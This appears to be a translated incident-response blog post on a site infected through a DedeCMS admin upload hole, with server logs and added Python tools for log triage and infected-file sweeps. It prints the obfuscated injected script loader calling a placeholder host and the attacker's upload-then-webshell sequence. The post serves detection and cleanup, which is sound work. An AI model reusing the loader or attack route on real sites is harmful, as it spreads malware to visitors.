

Website planted with a hidden malicious script (挂马)

When visiting uchome.c1gstudio.com, Kaspersky reported a trojan; NOD32 and Norton did not react.

Finding how the script was planted
With IE8 plus its Developer Tools and HttpWatch, the malicious request could be seen; with IE6, IE7 plus Fiddler 2, and Firefox 2 and 3 plus Firebug, the request could not be found.
The request address was (the real address is hidden; shown for illustration only):

  http://xxx.xxxw3.com/a.js

The request is not present in the home page source, but a DOM inspector shows it.
I made a temporary HTML file, copied the home page source into it, and by adding and removing code narrowed the injection down to /source/script_common.js.
FTP-ing to the server confirmed that this file had been modified, with the following loader on its first line:

  document.writeln("<script src=http:\/\/xxx.xxxw3.com\/%61.js><\/script>");

The escaped slashes and the percent-encoded filename (%61 is the letter a, so this fetches http://xxx.xxxw3.com/a.js) are why a plain search for the URL in the page source finds nothing.

Under uchome.c1gstudio.com/ there was also an x.php, which looked very suspicious.
Downloaded, it turned out to be encoded; decoded, it was the "黑狼PHP木马" (Black Wolf PHP webshell).
The file's upload date was 2009/04/20.

Searching turned up the same file in the document roots of other domains as well; I renamed them immediately to cut off the attacker's access.

  find /opt/htdocs -name 'x.php' -print

How did the attacker get the webshell onto the server?
Search the recent web access logs to see what the attacker did.

  grep '/x.php' /opt/nging/logs/uchome.c1gstudio.com.log

That gives the attacker's IP; next, search for everything that IP did.

  grep 125.70.209.110 /opt/nging/logs/uchome.c1gstudio.com.log
  125.70.209.110 - - [20/Apr/2009:10:12:16 +0800] "GET / HTTP/1.1" 200 5129 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [20/Apr/2009:10:12:17 +0800] "GET / HTTP/1.1" 200 5130 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [20/Apr/2009:10:12:22 +0800] "-" 400 0 "-" "-" -
  125.70.209.110 - - [20/Apr/2009:10:12:35 +0800] "GET //x.php HTTP/1.1" 200 444 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [20/Apr/2009:10:12:35 +0800] "GET /favicon.ico HTTP/1.1" 200 3638 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -

By then the webshell was already uploaded (note the 200 for //x.php at 10:12:35), so check an earlier day's log.

  grep 125.70.209.110 /opt/nging/logs/uchome.c1gstudio.com.20090419.log
  125.70.209.110 - - [19/Apr/2009:19:25:01 +0800] "GET /../admin/index.asp HTTP/1.1" 400 170 "-" "-" -
  125.70.209.110 - - [19/Apr/2009:19:25:09 +0800] "GET /../admin/default.asp HTTP/1.1" 400 170 "-" "-" -
  125.70.209.110 - - [19/Apr/2009:19:25:12 +0800] "GET /../admin/manage.asp HTTP/1.1" 400 170 "-" "-" -
  125.70.209.110 - - [19/Apr/2009:19:40:01 +0800] "GET / HTTP/1.1" 200 5234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:40:48 +0800] "GET /do.php?ac=sendmail&rand=1240141201 HTTP/1.1" 200 35 "http://uchome.c1gstudio.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:40:48 +0800] "GET /favicon.ico HTTP/1.1" 200 3638 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:42:35 +0800] "GET /includes/class.Member.php HTTP/1.1" 404 526 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:42:36 +0800] "GET /favicon.ico HTTP/1.1" 304 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:42:45 +0800] "GET /includes/ HTTP/1.1" 404 526 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:42:46 +0800] "GET /favicon.ico HTTP/1.1" 304 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:43:19 +0800] "GET / HTTP/1.1" 200 5236 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:43:27 +0800] "GET /do.php?ac=sendmail&rand=1240141399 HTTP/1.1" 200 35 "http://uchome.c1gstudio.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:43:28 +0800] "GET /favicon.ico HTTP/1.1" 200 3638 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:44:17 +0800] "GET /x.php HTTP/1.1" 404 526 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:44:17 +0800] "GET /favicon.ico HTTP/1.1" 304 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -

The attacker was scanning the site but had not yet uploaded x.php (the request for /x.php at 19:44:17 got a 404), so the upload probably did not happen under this domain.
Switch to another domain's log (file.c1gstudio.com, judging by the referers):

  125.70.209.110 - - [19/Apr/2009:19:25:36 +0800] "GET /DB%23steer/DBBACK/steer@DB.asp HTTP/1.1" 404 3864 "-" "Mozilla/4.0" -
  125.70.209.110 - - [19/Apr/2009:19:25:38 +0800] "GET //guanli/ HTTP/1.1" 302 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:25:38 +0800] "GET //guanli/login.php?gotopage=%2F%2Fguanli%2F HTTP/1.1" 200 984 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:25:42 +0800] "GET //include/vdimgck.php HTTP/1.1" 200 1304 "http://file.c1gstudio.com//guanli/login.php?gotopage=%2F%2Fguanli%2F" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:25:44 +0800] "GET /favicon.ico HTTP/1.1" 404 1803 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:25:51 +0800] "GET //guanli/ruletest.php HTTP/1.1" 200 1152 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:25:52 +0800] "GET /favicon.ico HTTP/1.1" 404 1803 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:25:59 +0800] "POST //guanli/ruletest.php HTTP/1.1" 200 48 "http://file.c1gstudio.com//guanli/ruletest.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:26:02 +0800] "GET //guanli/yhs.php HTTP/1.1" 200 35 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:26:03 +0800] "GET /favicon.ico HTTP/1.1" 404 1803 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:26:11 +0800] "GET /guanli/yhs.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 2536 "http://file.c1gstudio.com//guanli/yhs.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:26:11 +0800] "GET /guanli/yhs.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 2158 "http://file.c1gstudio.com//guanli/yhs.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:26:11 +0800] "POST //guanli/yhs.php HTTP/1.1" 200 8617 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:26:13 +0800] "POST //guanli/yhs.php HTTP/1.1" 200 77 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:26:40 +0800] "POST //guanli/yhs.php HTTP/1.1" 200 53 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:26:47 +0800] "GET //guanli/x.php HTTP/1.1" 200 444 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:26:48 +0800] "GET /favicon.ico HTTP/1.1" 404 1803 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:26:51 +0800] "POST //guanli/x.php HTTP/1.1" 200 159 "http://file.c1gstudio.com//guanli/x.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
  125.70.209.110 - - [19/Apr/2009:19:26:54 +0800] "GET /guanli/x.php HTTP/1.1" 200 444 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
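As an added example (not part of the original post), the following Python script does the log triage described above in one pass instead of repeated grep runs: it parses nginx combined-format lines, finds every client that successfully reached a file named like the webshell, rebuilds that client's timeline across whatever logs were merged in (the post had to check two vhost logs on two days), and flags the events that matter in an investigation: POSTs that returned 200 (uploads or shell commands) and paths that went from 404 to 200 for the same client (the file appeared in between). The sample log lines are constructed, modeled on the entries quoted above; the function names, the second IP and the shortened User-Agent strings are illustrative.

```python
import re
from datetime import datetime

# Constructed sample lines in nginx "combined" format, modeled on the entries
# quoted in the post (same client IP and paths; not a real log file).
SAMPLE_LOG = """\
125.70.209.110 - - [19/Apr/2009:19:25:51 +0800] "GET //guanli/ruletest.php HTTP/1.1" 200 1152 "-" "Mozilla/4.0 (compatible; MSIE 6.0)" -
125.70.209.110 - - [19/Apr/2009:19:25:59 +0800] "POST //guanli/ruletest.php HTTP/1.1" 200 48 "http://file.c1gstudio.com//guanli/ruletest.php" "Mozilla/4.0 (compatible; MSIE 6.0)" -
125.70.209.110 - - [19/Apr/2009:19:26:02 +0800] "GET //guanli/yhs.php HTTP/1.1" 200 35 "-" "Mozilla/4.0 (compatible; MSIE 6.0)" -
125.70.209.110 - - [19/Apr/2009:19:26:11 +0800] "POST //guanli/yhs.php HTTP/1.1" 200 8617 "-" "Mozilla/4.0 (compatible; MSIE 6.0)" -
125.70.209.110 - - [19/Apr/2009:19:26:47 +0800] "GET //guanli/x.php HTTP/1.1" 200 444 "-" "Mozilla/4.0 (compatible; MSIE 6.0)" -
125.70.209.110 - - [19/Apr/2009:19:44:17 +0800] "GET /x.php HTTP/1.1" 404 526 "-" "Mozilla/4.0 (compatible; MSIE 6.0)" -
125.70.209.110 - - [20/Apr/2009:10:12:22 +0800] "-" 400 0 "-" "-" -
125.70.209.110 - - [20/Apr/2009:10:12:35 +0800] "GET //x.php HTTP/1.1" 200 444 "-" "Mozilla/4.0 (compatible; MSIE 6.0)" -
10.0.0.5 - - [20/Apr/2009:10:13:00 +0800] "GET /x.php HTTP/1.1" 404 526 "-" "Mozilla/5.0 (scanner)" -
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def normalize_path(target):
    """Drop the query string and collapse '//guanli/x.php' to '/guanli/x.php'."""
    return re.sub(r"/+", "/", target.split("?", 1)[0])


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    parts = e["request"].split(" ")
    # A bare "-" request (the 400 in the post) has no method or path.
    e["method"], target = (parts[0], parts[1]) if len(parts) == 3 else ("-", "-")
    e["path"] = normalize_path(target)
    e["status"] = int(e["status"])
    e["time"] = datetime.strptime(e["time"], "%d/%b/%Y:%H:%M:%S %z")
    return e


def parse_log_text(text):
    return [e for e in map(parse_line, text.splitlines()) if e]


def webshell_clients(entries, shell_names=("x.php",)):
    """IPs that got a 200 for a file named like the webshell; 404 probes do not count."""
    return {e["ip"] for e in entries
            if e["status"] == 200 and e["path"].rsplit("/", 1)[-1] in shell_names}


def timeline(entries, ip):
    """Everything this client did, in time order, across all merged logs."""
    return sorted((e for e in entries if e["ip"] == ip), key=lambda e: e["time"])


def suspicious_events(entries, ip):
    """(time, kind, path) for successful POSTs and for paths that went 404 -> 200."""
    events, missing = [], set()
    for e in timeline(entries, ip):
        if e["status"] == 404:
            missing.add(e["path"])
        elif e["status"] == 200:
            if e["method"] == "POST":
                events.append((e["time"], "POST_OK", e["path"]))
            if e["path"] in missing:          # the file appeared after a 404
                events.append((e["time"], "APPEARED", e["path"]))
                missing.discard(e["path"])
    return events


if __name__ == "__main__":
    entries = parse_log_text(SAMPLE_LOG)
    for ip in sorted(webshell_clients(entries)):
        print("webshell client:", ip)
        for t, kind, path in suspicious_events(entries, ip):
            print(f"  {t:%Y-%m-%d %H:%M:%S}  {kind:<9} {path}")
```

On the constructed sample, the only webshell client is 125.70.209.110, and its flagged events are the two successful POSTs (ruletest.php, then yhs.php) followed by /x.php appearing on the 20th after the 404 on the 19th, which is exactly the sequence the post reconstructs by hand. To run it on real logs, concatenate the vhost logs for the relevant days and pass the text to parse_log_text.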

Attack method
The attacker used //guanli/ruletest.php to upload yhs.php, then uploaded the x.php webshell (the POSTs to yhs.php at 19:26:11 to 19:26:40 precede the first 200 for x.php at 19:26:47), and used x.php to inject the loader into the site's files.

The vulnerability
ruletest.php belongs to the DedeCMS admin backend (here the /guanli/ directory) and is a known DedeCMS security hole.

Finding infected files
Check whether the web directory contains the injected loader:
find /opt/htdocs \( -name '*.js' -o -name '*.htm' -o -name '*.html' -o -name '*.php' \) \
    -exec grep -I -l 'w3.com' {} +

Check whether the web directory still contains backdoors:
find /opt/htdocs -name 'x.php' -print

Recently modified files (a backdoor can set a file's modification time itself, so this is unreliable; touch and PHP's touch() rewrite mtime but not the inode change time, so listing by -ctime as well catches files whose mtime was backdated):
find /opt/htdocs -mtime -1 -type f -exec ls -l {} \;
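As an added example serving both the loader hunt earlier in the post (the escaped, percent-encoded document.writeln line found in script_common.js) and the sweep of the web directory just described, here is a Python sweep that is not the post's own code. It decodes the \/ and %xx obfuscation before matching, so a loader hidden as %61.js is caught by a content scan that a plain grep for the URL would miss; it flags the backdoor filenames the post names; and for each hit it compares mtime with ctime, because touch and PHP's touch() can backdate mtime but not the inode change time. It builds a constructed throwaway web root under a temp directory to run against; the IOC domain (the post's own placeholder for the hidden real one), the file contents and the function names are illustrative.

```python
import os
import re
import tempfile
from urllib.parse import unquote

# Indicators drawn from the post. The domain is the post's placeholder for the
# real one; the filenames are the backdoor names it reports.
IOC_DOMAINS = ("xxxw3.com",)
SHELL_NAMES = ("x.php", "yhs.php")
WEB_EXTS = (".js", ".htm", ".html", ".php")

# document.write / document.writeln emitting an external <script src=...>
INJECT_RE = re.compile(r"document\.write(?:ln)?\s*\(.*?<script[^>]*\bsrc=", re.I | re.S)


def deobfuscate(text):
    """Undo the two tricks in the injected line: '\\/' -> '/' and %xx -> char."""
    return unquote(text.replace("\\/", "/"))


def scan_text(text):
    """Reasons a file body looks injected; [] when clean."""
    plain = deobfuscate(text)
    reasons = []
    if INJECT_RE.search(plain):
        reasons.append("document.write <script src=> loader")
    reasons += ["references " + d for d in IOC_DOMAINS if d in plain]
    return reasons


def backdated_mtime(st, slack=60):
    """touch/PHP touch() can rewrite mtime but not ctime; a big gap means backdating."""
    return st.st_ctime - st.st_mtime > slack


def sweep(root):
    """Walk a web root; return [(relative path, [reasons])] sorted by path."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            reasons = ["known backdoor filename"] if name in SHELL_NAMES else []
            if name.endswith(WEB_EXTS):
                with open(full, "rb") as f:
                    reasons += scan_text(f.read().decode("latin-1"))
            # Only annotate actual hits: on a real tree rsync/chown also bump ctime.
            if reasons and backdated_mtime(os.stat(full)):
                reasons.append("mtime older than ctime (backdated)")
            if reasons:
                hits.append((os.path.relpath(full, root).replace(os.sep, "/"), reasons))
    return sorted(hits)


def build_demo_tree():
    """Constructed throwaway web root mimicking the post's layout; not real site files."""
    root = tempfile.mkdtemp(prefix="htdocs_")
    os.makedirs(os.path.join(root, "source"))
    os.makedirs(os.path.join(root, "guanli"))
    files = {
        # the loader line as the post shows it, escaped slashes and %61 included
        "source/script_common.js":
            'document.writeln("<script src=http:\\/\\/xxx.xxxw3.com\\/%61.js><\\/script>");\n'
            "function ok() {}\n",
        "index.php": "<?php echo 'hello'; ?>\n",
        "guanli/x.php": "<?php /* placeholder for the encoded webshell body */ ?>\n",
        "404.htm": "<html><body>not found</body></html>\n",
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w") as f:
            f.write(body)
    # Backdate the infected file the way a webshell's touch() would.
    old = 1_200_000_000  # 2008-01-10, long before the incident
    os.utime(os.path.join(root, "source", "script_common.js"), (old, old))
    return root


if __name__ == "__main__":
    for path, reasons in sweep(build_demo_tree()):
        print(path, "->", "; ".join(reasons))
```

Against the constructed tree the sweep reports guanli/x.php by filename and source/script_common.js for the decoded loader, the IOC domain and the backdated mtime, while index.php and 404.htm are left alone. Point sweep() at the real document root (/opt/htdocs in the post) to use it on a live server; the ctime check only says the timestamp was rewritten, so it is evidence to weigh, not proof on its own.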

The attacker inserted multiple copies of the loader into most html, js and php files, including 404.htm.
Several renamed webshells were uploaded into different directories, and upload code was spliced into the existing application files.

Remediation
Because too much was infected, the existing web directory was removed and the files were re-uploaded.
The DedeCMS admin backend was deleted.
The MySQL, host and web admin passwords were changed.


Posted in 安全 (Security).


